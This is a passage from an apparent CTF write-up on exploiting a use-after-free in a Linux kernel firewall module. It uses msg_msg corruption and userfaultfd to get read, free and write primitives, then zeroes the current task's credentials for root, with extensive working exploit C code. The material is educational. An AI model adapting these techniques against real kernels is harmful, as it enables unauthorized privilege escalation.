if (copy_to_user(dest, seg + 1, alen)) // [2.2.5]
return -1;
}
return 0;
}
store_msg(), based on the value of alen [2.2.1] (0xfd0 in our case, exactly what we have already seen in load_msg() and alloc_msg()), copies the message data to the user space buffer [2.2.2]. Then it traverses the list of segments until there are no more segments left [2.2.3], each time recalculating alen [2.2.4] and copying the segment data to user space [2.2.5]. In our case there is only one segment, from which 0xff8 bytes are copied.
Once the procedure is completed, as we can see in the
do_msgrcv()
source code, it
calls
free_msg()
[3] to deallocate the message and its respective segment:
void free_msg(struct msg_msg *msg)
{
struct msg_msgseg *seg;
security_msg_msg_free(msg);
seg = msg->next;
kfree(msg); // [3.1]
while (seg != NULL) { // [3.2]
struct msg_msgseg *tmp = seg->next;
cond_resched();
kfree(seg); // [3.3]
seg = tmp;
}
}
free_msg() first uses kfree() to free the message [3.1], then it traverses the singly linked list of segments [3.2] to deallocate them [3.3]. Now it is important to note that if we call msgrcv() with the MSG_COPY flag, for example as follows:
void *memdump = malloc(0x1fc8);
msgrcv(qid, memdump, 0x1fc8, 1, IPC_NOWAIT | MSG_COPY | MSG_NOERROR);
the kernel will not destroy the original message. From the do_msgrcv() source code, we can see that if MSG_COPY is set, the kernel uses prepare_copy() to allocate a temporary message [4], then calls copy_msg() to copy the content of the requested message (using memcpy()) into the copy. This way, after the message has been copied to user space, the original message is preserved, and only the copy is destroyed by free_msg(). This will be extremely important in the exploitation phase. The MSG_COPY flag can only be used if the kernel is compiled with CONFIG_CHECKPOINT_RESTORE, which is true by default in many Linux distributions.
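A quick way to probe for this at runtime is a minimal sketch like the following; it relies on the fact that, without CONFIG_CHECKPOINT_RESTORE, the MSG_COPY path in do_msgrcv() fails with ENOSYS (while on a supporting kernel an empty queue yields ENOMSG):

#include <errno.h>
#include <sys/msg.h>

/* probe: MSG_COPY on an empty queue fails with ENOMSG when supported,
   with ENOSYS when the kernel lacks CONFIG_CHECKPOINT_RESTORE */
int msg_copy_supported(int qid)
{
    char buf[0x10];
    msgrcv(qid, buf, sizeof(buf), 0, IPC_NOWAIT | MSG_COPY | MSG_NOERROR);
    return errno != ENOSYS;
}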
The Exploit: Out Of Bounds Read
At this point, after analyzing the code the kernel uses to perform message operations, it is quite clear how corrupting message metadata can be used to compromise the kernel. In the next sections, by corrupting fields of the msg_msg structure, we will find the address of the current task in memory and overwrite its credentials with zeroes to get root privileges.
How to get an arbitrary read by corrupting the m_ts and next fields of the msg_msg structure has already been shown by the Linux kernel developer and security researcher Alexander Popov in his excellent article Four Bytes of Power: Exploiting CVE-2021-26708 in the Linux kernel. After reading his article, I wondered what other primitives this elastic object could offer, and after analyzing the source code I managed to turn it into an exploitation toolkit.
Since the firewall does not offer any function we can exploit to get a leak (remember, show_rule() is exposed but not implemented), we first trigger the UAF by duplicating a rule and freeing it, then we allocate messages (thanks to the allocator’s LIFO freelist behavior, the freed rule chunk will be reused by one of the messages), and finally we corrupt the message’s m_ts field using edit_rule() to get an Out Of Bounds Read primitive when msgrcv() is called:
[...]
void send_msg(int qid, int size, int c)
{
struct msgbuf
{
long mtype;
char mtext[size - 0x30];
} msg;
msg.mtype = 1;
memset(msg.mtext, c, sizeof(msg.mtext));
if (msgsnd(qid, &msg, sizeof(msg.mtext), 0) == -1)
{
perror("msgsnd");
exit(1);
}
}
[...]
// [1]
if ((qid[0] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1)
{
perror("msgget");
exit(1);
}
if ((qid[1] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1)
{
perror("msgget");
exit(1);
}
// [2]
add_rule(0, buff, INBOUND);
duplicate_rule(0, INBOUND);
delete_rule(0, INBOUND);
send_msg(qid[0], 0x40, 'A'); // [3]
send_msg(qid[1], 0x40, 'B'); // [4]
send_msg(qid[1], 0x1ff8, 0); // [5]
[...]
First, we create two queues using msgget() [1]. Let’s identify the first queue as QID #0 and the second one as QID #1. Then we trigger the UAF by adding a rule to firewall_rules_in, duplicating it into firewall_rules_out, and freeing it from firewall_rules_in [2]. Despite the pointer being set to NULL in firewall_rules_in, it will still be accessible in firewall_rules_out.
Now we can use send_msg() (a msgsnd() wrapper) to allocate three messages. We allocate a first message of 0x40 bytes (0x30 bytes of header and 0x10 bytes of data) in the first queue, QID #0 [3]. Since we just freed the rule, the message will be allocated at the same address, giving us full control over the message header.
PS: It is important to note that this system is virtually noise-free. On a real system, we would need to saturate partial slabs before allocating the firewall rule, and instead of allocating three messages we would need to spray many of them.
Now we allocate two more messages in QID #1: a first message of 0x40 bytes (again, 0x30 bytes of header and 0x10 bytes of data) [4], which will also land in kmalloc-64, and a second one of 0x1ff8 bytes (0x30 bytes of header and 0x1fc8 bytes of data) [5]. At this point the situation in memory should be similar to the following diagram. Please note that because of freelist randomization, the first message may be allocated after the second one, and our leak attempt may fail. In this case we simply need to delete the second queue and run the exploit again, as sketched below.
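The retry could look like this minimal sketch (the sanity check is a hypothetical assumption; msgctl() with IPC_RMID destroys the queue and frees all of its queued messages):

#include <sys/msg.h>

/* if the leaked values don't look like kernel pointers, discard
   QID #1 (freeing its messages) and redo the spray */
if ((leak[1] >> 40) != 0xffff88) /* hypothetical sanity check */
{
    msgctl(qid[1], IPC_RMID, NULL);
    /* ... re-create the queue and repeat steps [4] and [5] ... */
}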
In the diagram above, in orange, we can see the message header of the first message in QID #0. We have full control over this object using edit_rule(). Also in kmalloc-64, we can see the other message, belonging to QID #1. The m_list.prev field of this message points to its message queue, QID #1; the m_list.next field instead points to the second message in QID #1, the large message in kmalloc-4k. That message, in turn, has a pointer to a segment, also in kmalloc-4k.
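To see why edit_rule() hands us the entire header, it helps to line rule_t up against msg_msg: both are 0x30 bytes, so after the UAF their fields overlap one-to-one. The layout below follows from the struct definitions shown earlier; the u32_to_ip() helper is a hypothetical illustration of the encoding the exploit’s edit_rule() wrapper has to perform.

#include <stdint.h>
#include <stdio.h>

/*
 *   rule_t (offset)            msg_msg
 *   0x00 iface[0..7]     <->   m_list.next
 *   0x08 iface[8..15]    <->   m_list.prev
 *   0x10 name[0..7]      <->   m_type
 *   0x18 name[8..15]     <->   m_ts
 *   0x20 ip              <->   next (low dword)
 *   0x24 netmask         <->   next (high dword)
 *   0x28 proto/port      <->   security (low dword)
 *
 * iface and name are raw memcpy()s, while ip and netmask go through
 * in4_pton(), which stores the four parsed bytes in memory order: to
 * plant a kernel pointer in msg->next, each half is encoded as a
 * dotted-quad string.
 */
void u32_to_ip(char *out, uint32_t v)
{
    uint8_t *b = (uint8_t *)&v;
    sprintf(out, "%d.%d.%d.%d", b[0], b[1], b[2], b[3]);
}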
We are ready to get an information leak by triggering an Out Of Bounds Read:
[...]
void *recv_msg(int qid, size_t size)
{
void *memdump = malloc(size);
if (msgrcv(qid, memdump, size, 0, IPC_NOWAIT | MSG_COPY | MSG_NOERROR) == -1)
{
perror("msgrcv");
return NULL;
}
return memdump;
}
[...]
uint64_t *arb_read(int idx, uint64_t target, size_t size, int overwrite)
{
struct evil_msg *msg = (struct evil_msg *)malloc(0x100);
msg->m_type = 0;
msg->m_ts = size; // [2]
if (overwrite)
{
msg->next = target;
edit_rule(idx, (unsigned char *)msg, OUTBOUND, 0);
}
else
{
edit_rule(idx, (unsigned char *)msg, OUTBOUND, 1); // [3]
}
free(msg);
return recv_msg(qid[0], size); // [4]
}
[...]
uint64_t *leak = arb_read(0, 0, 0x2000, 0); // [1]
[...]
Using arb_read() [1] with a size argument of 0x2000 bytes, we overwrite the target object’s m_ts field [2] using edit_rule() [3]. Then, calling recv_msg() (a msgrcv() wrapper) [4], we get an information leak. It is important to note that recv_msg() uses the MSG_COPY flag: by overwriting the target object we corrupted its m_list.next and m_list.prev fields, so without MSG_COPY, do_msgrcv() would try to unlink the message from the queue, causing a crash.
As we can see from the figure above, we have overwritten the m_ts field of the msg_msg in QID #0, which gives us an Out Of Bounds Read primitive when recv_msg() is called. This way, we can leak the m_list.next field of the message in QID #1 (the address of the large message in kmalloc-4k), its m_list.prev field (the pointer to QID #1), and sysfs_bin_kfops_ro.
PS: sysfs_bin_kfops_ro comes from mounting /sys in the init file. The symbol is there because the system is virtually noise-free: no other objects have been allocated since system startup. On a real system we would need to spray target objects in the slab before attempting the leak. For example, we could spray pipe_buffer structures, resizing pipe rings so that they are allocated in kmalloc-64, as sketched below.
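A minimal sketch of such a spray (an assumption about one possible approach, not code from the challenge exploit): shrinking a pipe’s ring to a single page makes the kernel reallocate its pipe_buffer array as a single 40-byte element, which lands in kmalloc-64.

#define _GNU_SOURCE
#include <fcntl.h>
#include <unistd.h>

#define N_PIPES 0x40

int pipes[N_PIPES][2];

void spray_pipe_buffers(void)
{
    for (int i = 0; i < N_PIPES; i++)
    {
        pipe(pipes[i]);
        /* one page -> one pipe_buffer slot -> kcalloc(1, 40) in kmalloc-64 */
        fcntl(pipes[i][0], F_SETPIPE_SZ, 0x1000);
    }
}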
sysfs_bin_kfops_ro belongs to the kernel data section and is not affected by FGKASLR, so we can use it to calculate the kernel base address, or the addresses of other symbols in the data section.
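For instance (the offsets below are hypothetical placeholders; the real values must be extracted from the challenge’s kernel image):

/* build-specific offsets, placeholders for illustration */
#define SYSFS_BIN_KFOPS_RO_OFF 0xe49ec0
#define INIT_TASK_OFF          0x1629780

uint64_t kbase     = sysfs_bin_kfops_ro - SYSFS_BIN_KFOPS_RO_OFF;
uint64_t init_task = kbase + INIT_TASK_OFF;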
The Exploit: From Out Of Bounds Read To Arbitrary Read
In the previous section, among other things, we leaked the address of sysfs_bin_kfops_ro. We can use it to calculate the address of init_task.
init_task corresponds to the task_struct of the first process executed by the system. In Linux, every task is defined by the structure task_struct, and tasks are linked together in a circular doubly linked list, tasks. In our discussion we are interested in three fields of task_struct:
tasks, the circular doubly linked list of tasks: for each task it contains pointers to the next and previous tasks.
pid, the process identifier.
cred, a structure that contains the process credentials: uid, gid, etc.
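A note on the constants used in find_current_task() below: the task_struct offsets are specific to this challenge’s kernel build; the values summarized here are inferred from the exploit’s constants, so treat them as build-dependent assumptions.

/* assumed task_struct offsets for this kernel build (inferred,
   build-dependent):
     tasks (list_head) around offset 0x298
     pid               around offset 0x398
     cred              around offset 0x540 */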
[...]
uint64_t find_current_task(uint64_t init_task)
{
pid_t pid, next_task_pid;
uint64_t next_task;
pid = getpid();
printf("[+] Current task PID: %d\n", pid);
puts("[*] Traversing tasks...");
leak = arb_read(0, init_task + 8, 0x1500, 1) + 0x1f9;
next_task = leak[0x298/8] - 0x298;
leak = arb_read(0, next_task + 8, 0x1500, 1) + 0x1f9;
next_task_pid = leak[0x398/8];
while (next_task_pid != pid) // [2]
{
next_task = leak[0x298/8] - 0x298; // [3]
leak = arb_read(0, next_task + 8, 0x2000, 1) + 0x1f9;
next_task_pid = leak[0x398/8]; // [4]
}
puts("[+] Current task found!");
return next_task;
}
[...]
puts("[*] Locating current task address...");
uint64_t current_task = find_current_task(init_task); // [1]
printf("[+] Leaked current task address: 0x%lx\n", current_task);
[...]
In the source code above, we use find_current_task() [1] to traverse all tasks, starting from init_task, until the current task is found [2]. find_current_task() uses arb_read() multiple times, overwriting the m_ts field and the next pointer of the target msg_msg object. For each task it leaks the pointer to the next task [3] and the task’s PID [4], then it compares the leaked PID with the current process PID, until there is a match:
In the figure above we can see that the m_ts field of the target object is now set to 0x2000 and its segment pointer points to init_task. Now, calling msgrcv(), the kernel will not only copy 0xfd0 bytes from the message, but also 0xff8 bytes from the fake segment: init_task. Once we have found the current task, we can use our arbitrary read primitive to leak the address of its cred structure:
[...]
leak = arb_read(0, current_task, 0x2000, 1) + 0x1fa;
cred_struct = leak[0x540/8];
printf("[+] Leaked current task cred struct: 0x%lx\n", cred_struct);
[...]
The Exploit: Arbitrary Free
At this point, we know the address of the current task and of its cred structure. Now we need to obtain an arbitrary write, but that is not so simple: first we need an arbitrary free primitive. An arbitrary free can be obtained by calling msgrcv() (without the MSG_COPY flag) two times:
[...]
msgrcv(qid[1], memdump, 0x1ff8, 1, IPC_NOWAIT | MSG_NOERROR); // [1]
msgrcv(qid[1], memdump, 0x1ff8, 1, IPC_NOWAIT | MSG_NOERROR); // [2]
[...]
The first time we call msgrcv() [1], the kernel frees the first message (in kmalloc-64) belonging to QID #1. When we call it again [2], the kernel frees the second message (in kmalloc-4k) and its respective segment (also in kmalloc-4k), both belonging to QID #1. The result in memory will be the following:
Now, this is a very important step, and it can be quite confusing. In the first part of the exploit, we leaked the address of the message in kmalloc-4k. In the previous step, when we used msgrcv() for the second time, free_msg() released the message in kmalloc-4k first, and then released its segment. Because of the freelist’s LIFO behavior, when we allocate a new message and its corresponding segment in kmalloc-4k, the new message will be allocated at the address of the old segment, and the new segment at the address of the old message. In other words, when we free and re-allocate a message and its segment, their positions are swapped. Since we previously leaked the address of the message, what we actually know after re-allocation is the address of the new segment. Here is a visual representation; we know the address of the green chunk:
Now that we have clarified this important point, we can use a pthread to allocate a new message and its respective segment in kmalloc-4k:
[...]
void *allocate_msg1(void *_)
{
printf("[Thread 1] Message buffer allocated at 0x%lx\n", page_1 + PAGE_SIZE - 0x10);
if ((qid[2] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1) // [2]
{
perror("msgget");
exit(1);
}
memset(page_1, 0, PAGE_SIZE);
((unsigned long *)(page_1))[0xff0 / 8] = 1;
if (msgsnd(qid[2], page_1 + PAGE_SIZE - 0x10, 0x1ff8 - 0x30, 0) < 0) // [3]
{
puts("msgsend failed!");
perror("msgsnd");
exit(1);
}
puts("[Thread 1] Message sent, *next overwritten!");
}
[...]
pthread_create(&tid[2], NULL, allocate_msg1, NULL); // [1]
[...]
We create a new thread that executes allocate_msg1() [1]. Here, we create a new queue [2], QID #2, then we use msgsnd() [3] to create a message of 0x1ff8 bytes (0x30 bytes of header and 0x1fc8 bytes of data), which in kernel space results in a 0x1000-byte message (0x30 bytes of header and 0xfd0 bytes of data) allocated in kmalloc-4k, plus a 0x1000-byte segment (0x8 bytes for the next pointer and 0xff8 bytes of data), also allocated in kmalloc-4k. The location page_1 + PAGE_SIZE - 0x10 is not random: we use userfaultfd to monitor the page at page_1 + PAGE_SIZE, waiting for a page fault. When load_msg() tries to copy our message to kernel space, it causes a page fault, and at that point we can suspend the kernel thread in the middle of the copy_from_user() operation.
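The userfaultfd registration itself is not shown above; here is a minimal sketch of the setup we are assuming. fault_handler_thread() stands for the servicing loop whose relevant branch is shown later in this section.

#define _GNU_SOURCE
#include <fcntl.h>
#include <linux/userfaultfd.h>
#include <pthread.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <unistd.h>

#define PAGE_SIZE 0x1000

long ufd;
void *page_1;

void *fault_handler_thread(void *arg); /* poll()s ufd, replies with UFFDIO_COPY */

void setup_ufd_region(void)
{
    struct uffdio_api api = { .api = UFFD_API };
    struct uffdio_register reg;
    pthread_t th;

    ufd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
    ioctl(ufd, UFFDIO_API, &api);

    /* two adjacent pages: the msgsnd() buffer starts 0x10 bytes before
       the end of the first page, so copy_from_user() runs off the end
       of page_1 into the registered, still-missing second page and
       faults mid-copy, freezing the kernel thread */
    page_1 = mmap(NULL, 2 * PAGE_SIZE, PROT_READ | PROT_WRITE,
                  MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

    reg.range.start = (unsigned long)page_1 + PAGE_SIZE;
    reg.range.len   = PAGE_SIZE;
    reg.mode        = UFFDIO_REGISTER_MODE_MISSING;
    ioctl(ufd, UFFDIO_REGISTER, &reg);

    pthread_create(&th, NULL, fault_handler_thread, NULL);
}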
This will result in the following situation in memory:
We can finally use the arbitrary free primitive:
[...]
void arb_free(int idx, uint64_t target)
{
struct evil_msg *msg = (struct evil_msg *)malloc(0x100);
void *memdump = malloc(0x2000);
msg->m_list.next = queue; // [2]
msg->m_list.prev = queue;
msg->m_type = 1;
msg->m_ts = 0x10;
msg->next = target; // [3]
edit_rule(idx, (unsigned char *)msg, OUTBOUND, 0); // [4]
puts("[*] Triggering arb free...");
msgrcv(qid[0], memdump, 0x10, 1, IPC_NOWAIT | MSG_NOERROR); // [5]
puts("[+] Target freed!");
free(memdump);
free(msg);
}
[...]
arb_free(0, large_msg); // [1]
[...]
The function arb_free() [1] is used to free the new segment. We use the message queue address leaked in the first part of the exploit to fix up m_list.next and m_list.prev [2]; this allows us to use msgrcv() without the MSG_COPY flag without crashing the kernel during the unlinking procedure. We also set the message’s next pointer to the target address [3]: the new segment in kmalloc-4k. When we overwrite the message [4], the situation in memory will be the following:
Now we can finally use msgrcv()
[5] to free the message in QID #0
and the new segment:
The Exploit: From Arbitrary Free To Arbitrary Write
Now the next pointer of our message in kmalloc-4k points to a freed object. We can create a new thread and allocate another message at that location:
[...]
void *allocate_msg2(void *_)
{
printf("[Thread 2] Message buffer allocated at 0x%lx\n", page_2 + PAGE_SIZE - 0x10);
if ((qid[3] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1) // [2]
{
perror("msgget");
exit(1);
}
memset(page_2, 0, PAGE_SIZE);
((unsigned long *)(page_2))[0xff0 / 8] = 1;
if (msgsnd(qid[3], page_2 + PAGE_SIZE - 0x10, 0x1028 - 0x30, 0) < 0) // [3]
{
puts("msgsend failed!");
perror("msgsnd");
exit(1);
}
puts("[Thread 2] Message sent, target overwritten!");
}
[...]
pthread_create(&tid[3], NULL, allocate_msg2, NULL); // [1]
[...]
We create a new thread [1], then in allocate_msg2() we create another queue, QID #3 [2], and use msgsnd() to allocate a 0x1028-byte message [3] (0x30 bytes of header and 0xff8 bytes of data). In kernel space this results in a 0x1000-byte message (0x30 bytes of header and 0xfd0 bytes of data), which will be allocated at the same address as the segment we previously freed with the arbitrary free primitive, plus a 0x30-byte segment (0x8 bytes for the next pointer and 0x28 bytes of data) that will be allocated in kmalloc-64. This time, our buffer is located at page_2 + PAGE_SIZE - 0x10 because we are monitoring page_2 + PAGE_SIZE with another userfaultfd thread, waiting for a page fault. load_msg() will hit the monitored page, causing the following situation in memory:
We can finally release the first faulting thread; this way we can overwrite the next pointer of the message we have just allocated in kmalloc-4k with the address of the current task’s cred structure minus 0x8 bytes:
[...]
if (page_fault_location == page_1 + PAGE_SIZE)
{
printf("[PFH 1] Page fault at 0x%lx\n", page_fault_location);
memset(buff, 0, PAGE_SIZE);
puts("[PFH 1] Releasing faulting thread");
struct evil_msg *msg = (struct evil_msg *)(buff + 0x1000 - 0x40);
msg->m_type = 0x1;
msg->m_ts = 0x1000;
msg->next = (uint64_t)(cred_struct - 0x8); // [1]
ufd_copy.dst = (unsigned long)(page_fault_location);
ufd_copy.src = (unsigned long)(&buff);
ufd_copy.len = PAGE_SIZE;
ufd_copy.mode = 0;
ufd_copy.copy = 0;
for (;;)
{
if (release_pfh_1)
{
if (ioctl(ufd, UFFDIO_COPY, &ufd_copy) < 0)
{
perror("ioctl(UFFDIO_COPY)");
exit(1);
}
puts("[PFH 1] Faulting thread released");
break;
}
}
}
[...]
We subtract 8 bytes [1] because we need the first QWORD of the fake segment to be NULL, otherwise load_msg() will try to access the next segment, causing a crash. Once the first faulting thread is released, this is how the memory will look:
The next pointer of the message in QID #3 now points to the current task’s credentials. The last step is predictable: we release the second faulting thread, overwriting the credentials with zeroes. This gives us root privileges.
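Assuming the overwrite zeroes the uid/gid fields of the cred structure, the finale is the usual check-and-shell (a sketch, not taken verbatim from the exploit):

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

[...]
if (getuid() == 0)
{
    puts("[+] Enjoy your root shell!");
    system("/bin/sh");
}
[...]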
Here is the exploit in action:
The complete exploit can be found here:
exploit.c
Conclusion
The technique described in the previous sections is applicable to multiple caches, from kmalloc-64 up to kmalloc-4k. In the specific case of kmalloc-4k, the exploitation turns out to be simpler; to learn more, I recommend reading the excellent writeup of Fire of Salvation by FizzBuzz101. It is worth noting that in a less protected environment, such as common Linux distributions (with CONFIG_STATIC_USERMODEHELPER unset, without FGKASLR, and so on), the technique can be simplified by targeting modprobe_path, core_pattern, etc., instead of the current task’s credentials.
As always, for any question or clarification feel free
to contact me (check About).
Challenge links: Fire of Salvation / Wall of Perdition
References
SMAP / SMEP
FGKASLR
NetFilter
CVE-2021-26708 by a13xp0p0v